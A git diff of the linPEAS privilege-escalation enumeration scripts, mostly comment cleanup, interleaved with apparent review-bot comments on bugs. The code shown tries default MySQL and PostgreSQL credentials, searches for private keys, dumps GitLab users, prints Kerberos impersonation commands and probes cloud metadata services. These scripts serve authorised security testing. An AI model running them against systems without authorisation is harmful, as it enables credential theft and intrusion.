diff --git a/linPEAS/builder/linpeas_builder.py b/linPEAS/builder/linpeas_builder.py index f3262a1ad..04170f112 100644 --- a/linPEAS/builder/linpeas_builder.py +++ b/linPEAS/builder/linpeas_builder.py @@ -6,12 +6,12 @@ import os import stat -#python3 -m builder.linpeas_builder +# python3 -m builder.linpeas_builder def main(): # Load configuration ploaded = PEASLoaded() - # Build temporary linpeas_base.sh file + # Build temporary linpeas_base.sh file lbasebuilder = LinpeasBaseBuilder() lbasebuilder.build() @@ -20,7 +20,7 @@ def main(): lbuilder.build() lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH) lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS") - os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file + os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base.sh file st = os.stat(FINAL_FAT_LINPEAS_PATH) os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC) @@ -30,4 +30,4 @@ def main(): if __name__ == "__main__": - main() \ No newline at end of file + main() diff --git a/linPEAS/builder/linpeas_parts/2_container.sh b/linPEAS/builder/linpeas_parts/2_container.sh index 8f5b7dba3..429e25d78 100644 --- a/linPEAS/builder/linpeas_parts/2_container.sh +++ b/linPEAS/builder/linpeas_parts/2_container.sh @@ -16,7 +16,7 @@ containerCheck() { containerType="docker\n" fi - # Are we inside kubenetes? + # Are we inside kubernetes? if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || grep -qai kubepods /proc/self/cgroup 2>/dev/null; then @@ -257,7 +257,7 @@ else if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi fi -#If docker +# If docker if echo "$containerType" | grep -qi "docker"; then print_2title "Docker Container details" inDockerGroup 
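Review bot: In the `@@ -20,7 +20,7 @@` hunk, `os.remove(TEMPORARY_LINPEAS_BASE_PATH)` only runs when `lbuilder.build()` and both `write_linpeas` calls return normally, so any exception in the build leaves the temporary linpeas_base.sh behind on disk (presumably regenerated by the next run, but still a stale artifact after a failed build). Putting the three build/write calls in a `try:` and the removal in `finally: os.remove(TEMPORARY_LINPEAS_BASE_PATH)` keeps the cleanup on every path while leaving the success path unchanged. `main()` starts and ends outside the hunk, so the lines that create `lbuilder` are not visible here.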
@@ -279,7 +279,7 @@ if echo "$containerType" | grep -qi "docker"; then fi fi -#If token secrets mounted +# If token secrets mounted if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then print_2title "Listing mounted tokens" print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod" diff --git a/linPEAS/builder/linpeas_parts/3_cloud.sh b/linPEAS/builder/linpeas_parts/3_cloud.sh index 413fa50aa..39f53e495 100644 --- a/linPEAS/builder/linpeas_parts/3_cloud.sh +++ b/linPEAS/builder/linpeas_parts/3_cloud.sh @@ -150,9 +150,9 @@ if [ "$is_gcp" = "Yes" ]; then echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi - + # GCP Enumeration if [ "$gcp_req" ]; then - print_2title "Google CLoud Platform Enumeration" + print_2title "Google Cloud Platform Enumeration" print_info "https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security" ## GC Project Info @@ -236,7 +236,7 @@ if [ "$is_gcp" = "Yes" ]; then fi fi - +# AWS ECS Enumeration if [ "$is_aws_ecs" = "Yes" ]; then print_2title "AWS ECS Enumeration" @@ -270,6 +270,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then fi fi +# AWS EC2 Enumeration if [ "$is_aws_ec2" = "Yes" ]; then print_2title "AWS EC2 Enumeration" @@ -334,6 +335,7 @@ if [ "$is_aws_ec2" = "Yes" ]; then fi fi +# AWS Lambda Enumeration if [ "$is_aws_lambda" = "Yes" ]; then print_2title "AWS Lambda Enumeration" printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME @@ -346,6 +348,7 @@ if [ "$is_aws_lambda" = "Yes" ]; then printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") fi +# AWS Codebuild Enumeration if [ "$is_aws_codebuild" = "Yes" ]; then print_2title "AWS Codebuild Enumeration" 
@@ -371,6 +374,7 @@ if [ "$is_aws_codebuild" = "Yes" ]; then fi fi +# DO Droplet Enumeration if [ "$is_do" = "Yes" ]; then print_2title "DO Droplet Enumeration" @@ -398,11 +402,12 @@ if [ "$is_do" = "Yes" ]; then fi fi +# IBM Cloud Enumeration if [ "$is_ibm_vm" = "Yes" ]; then print_2title "IBM Cloud Enumeration" if ! [ "$IBM_TOKEN" ]; then - echo "Couldn't get the metdata token:(" + echo "Couldn't get the metadata token:(" else TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN" @@ -436,12 +441,13 @@ if [ "$is_ibm_vm" = "Yes" ]; then fi +# Azure VM Enumeration if [ "$is_az_vm" = "Yes" ]; then print_2title "Azure VM Enumeration" HEADER="Metadata:true" URL="http://169.254.169.254/metadata" - API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions + API_VERSION="2021-12-13" # https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions az_req="" if [ "$(command -v curl)" ]; then diff --git a/linPEAS/builder/linpeas_parts/7_software_information.sh b/linPEAS/builder/linpeas_parts/7_software_information.sh index 40598a499..a016f01c0 100644 --- a/linPEAS/builder/linpeas_parts/7_software_information.sh +++ b/linPEAS/builder/linpeas_parts/7_software_information.sh @@ -45,7 +45,7 @@ if [ "$MACPEAS" ]; then done fi -#-- SI) Mysql version +#-- SI) MySQL version if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" @@ -56,7 +56,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; echo "" echo "" - #-- SI) Mysql connection root/root + #-- SI) MySQL connection root/root print_list "MySQL connection using default root/root ........... " mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) if [ "$mysqlconnect" ]; then 
@@ -65,7 +65,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; else echo_no fi - #-- SI) Mysql connection root/toor + #-- SI) MySQL connection root/toor print_list "MySQL connection using root/toor ................... " mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) if [ "$mysqlconnect" ]; then @@ -74,7 +74,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; else echo_no fi - #-- SI) Mysql connection root/NOPASS + #-- SI) MySQL connection root/NOPASS mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) print_list "MySQL connection using root/NOPASS ................. " if [ "$mysqlconnectnopass" ]; then @@ -85,7 +85,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; echo "" fi -#-- SI) Mysql credentials +#-- SI) MySQL credentials if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title "Searching mysql credentials and exec" printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do @@ -144,7 +144,7 @@ peass{PostgreSQL} #-- SI) PostgreSQL brute if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. -#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this +# Checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no 
@@ -239,7 +239,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) # If there is tons of files linpeas gets frozen here without a timeout privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) fi else @@ -352,8 +352,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PST printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do if [ "$l" ] && echo "$l" | grep -q "@"; then printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + # kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + # We could also try to create a new user or modify a password, but I'm not user if linpeas should do that fi done elif echo "$f" | grep -q krb5.conf; then 
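Review bot: The two comment lines rewritten in the `@@ -352,8 +352,8 @@` hunk keep their typos on the new side: `impersoanted` should be `impersonated`, and `I'm not user if linpeas should do that` should read `I'm not sure if linpeas should do that`. Since the commit's purpose is comment cleanup, fixing these on the same lines avoids touching them again later. The enclosing `while read l` loop and the `if/elif` chain on `$f` extend beyond the hunk.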
@@ -533,7 +533,7 @@ fi ##-- SI) Gitlab if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then print_2title "Searching GitLab related files" - #Check gitlab-rails + # Check gitlab-rails if [ "$(command -v gitlab-rails)" ]; then echo "gitlab-rails was found. Trying to dump users..." gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," @@ -546,7 +546,7 @@ if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$ echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" echo "" fi - #Check gitlab files + # Check gitlab files printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do if echo $f | grep -q secrets.yml; then echo "Found $f" | sed "s,$f,${SED_RED}," diff --git a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh index 579d239c1..ae522863b 100644 --- a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh +++ b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh 
@@ -24,15 +24,15 @@ fi suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) for s in $suids_files; do s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + # If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total"; then break; fi sname="$(echo $s | awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing + true # Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits) echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" 
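Review bot: The reworded comment on the new side, `# If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder`, describes a pipeline this loop no longer uses: `for s in $suids_files` iterates the `find` output one path at a time and `ls -lahtr "$s"` is run on a single file, so the `^total` guard and its comment look like leftovers and the comment should either say why the guard is still needed or the guard should go. The same stale comment is carried into the SGID loop in the `@@ -105,7 +105,7 @@` hunk. The `elif` comment on this hunk still reads `permision` (also in the `@@ -113,7 +113,7 @@` hunk and in 9_interesting_files.sh `@@ -11,7 +11,7 @@`); `permission` would fix all three. The loop body continues past the end of the hunk.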
@@ -55,12 +55,12 @@ for s in $suids_files; do $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do sline_first="$(echo "$sline" | cut -d ' ' -f1)" if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then # Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi fi @@ -105,7 +105,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sud sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) for s in $sgids_files; do s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + # If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total";then break; fi sname="$(echo $s | awk '{print $9}')" 
@@ -113,7 +113,7 @@ for s in $sgids_files; do true #Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits) echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" @@ -136,12 +136,12 @@ for s in $sgids_files; do $STRINGS "$sname" | sort | uniq | while read sline; do sline_first="$(echo $sline | cut -d ' ' -f1)" if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + else # If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then # Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" fi fi 
@@ -456,7 +456,7 @@ fi if ! [ "$IAMROOT" ]; then print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + # In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$obmowbe" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; @@ -488,4 +488,4 @@ if ! [ "$IAMROOT" ]; then fi done echo "" -fi \ No newline at end of file +fi diff --git a/linPEAS/builder/linpeas_parts/9_interesting_files.sh b/linPEAS/builder/linpeas_parts/9_interesting_files.sh index a6e19f357..b7ed08ace 100644 --- a/linPEAS/builder/linpeas_parts/9_interesting_files.sh +++ b/linPEAS/builder/linpeas_parts/9_interesting_files.sh 
@@ -11,7 +11,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -O "$f" ]; then echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then # If write permision, win found (no check exploits) echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; 
@@ -80,14 +80,14 @@ find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/ echo "" ##-- IF) Writable log files -if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below +if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then # 3.18.0 and below print_2title "Writable log files (logrotten) (limit 50)" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then # Only print info if something interesting found if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; 
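Review bot: The condition on the changed `if` line has the form `A && B && C || D && E`, which the shell parses left to right with equal precedence as `(((A && B) && C) || D) && E`, so the branch is entered only when `echo "$log" | grep -qE "$Wfolders"` succeeds and a writable log file outside those folders is never reported, making the `[ -w "$log" ]` test on that line ineffective. Group the two alternatives explicitly: `if { ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ]; } || { ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; }; then # Only print info if something interesting found`. The enclosing `while read log` loop and the outer logrotate `if` block continue past the end of the hunk.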
@@ -164,7 +164,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then SQLITEPYTHON="" echo "" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then # If readable and filecmd and sqlite, or readable and not filecmd if [ "$(command -v sqlite3 2>/dev/null)" ]; then tables=$(sqlite3 $f ".tables" 2>/dev/null) #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" @@ -186,7 +186,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then else columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) fi - #Check found columns for interesting fields + # Check found columns for interesting fields INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") if [ "$INTCOLUMN" ]; then printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" diff --git a/linPEAS/builder/linpeas_parts/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh index f77efd857..c0f945a9f 100755 --- a/linPEAS/builder/linpeas_parts/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -51,7 +51,7 @@ ITALIC="${C}[3m" # --) SUPERFAST - FAST & do not search for special filaes in all the folders if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi -FAST="1" #By default stealth/fast mode +FAST="1" # By default stealth/fast mode SUPERFAST="" DISCOVERY="" PORTS="" 
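Review bot: The `columns=$($SQLITEPYTHON -c "...connect('$f')...name =\'$t\'..." 2>/dev/null)` line on the new side of the `@@ -186,7 +186,7 @@` hunk splices the database path and the table name into Python source text, so a path or table name containing a quote breaks the snippet, and on a hostile host it lets file contents run arbitrary Python under the enumerating user. Pass both values as arguments instead: `columns=$($SQLITEPYTHON -c 'import sqlite3,sys; print(sqlite3.connect(sys.argv[1]).cursor().execute("SELECT sql FROM sqlite_master WHERE type!=? AND sql NOT NULL AND name=?", ("meta", sys.argv[2])).fetchall()[0][0])' "$f" "$t" 2>/dev/null)`. In the `@@ -164,7 +164,7 @@` hunk the `sqlite3 $f ".tables"` call additionally leaves `$f` unquoted, so a path with whitespace is split; `sqlite3 "$f" ".tables"` matches the quoting already used in the `[ -r "$f" ]` tests. The enclosing `while read f` loop starts and ends outside the hunk.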
@@ -68,9 +68,9 @@ EXTRA_CHECKS="" REGEXES="" PORT_FORWARD="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" -[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 -[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 -[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2 +[ -z "$THREADS" ] && THREADS="2" # If THREADS is empty, put number 2 +[ -n "$THREADS" ] && THREADS="2" # If THREADS is null, put number 2 +[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" # It THREADS is not a number, put number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${GREEN} Checks: @@ -124,7 +124,7 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do e) EXTRA_CHECKS="1";; r) REGEXES="1";; f) SEARCH_IN_FOLDER=$OPTARG; - if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/" + if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then # Make sure firmware folder ends with "/" SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; fi; ROOT_FOLDER=$SEARCH_IN_FOLDER; 
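Review bot: The second guard on the new side, `[ -n "$THREADS" ] && THREADS="2"`, fires whenever THREADS is non-empty, which after the preceding `-z` guard is always, so the CPU count computed on the `THREADS=` line above is discarded and the numeric `-eq` check that follows is dead; the comment `# If THREADS is null` does not describe what `-n` tests. Unless something later relies on THREADS always being 2, that line should be deleted, leaving `[ -z "$THREADS" ] && THREADS="2"` and `[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2"` to cover the empty and non-numeric cases. If a non-numeric fallback was the intent, the `-eq` line already provides it.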
@@ -319,7 +319,7 @@ mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut if ! [ "$mounted" ]; then mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}') fi -if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty +if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi # Don't let any blacklist to be empty mountG="swap|/cdrom|/floppy|/dev/shm" notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee" mountpermsB="\Wsuid|\Wuser|\Wexec" @@ -329,7 +329,7 @@ rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmt groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)" groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)" -knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html +knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' # https://www.togaware.com/linux/survivor/Standard_Groups.html mygroups=$(groups 2>/dev/null | tr " " "|") # Default Binaries List 
@@ -338,7 +338,7 @@ sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnomet sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" 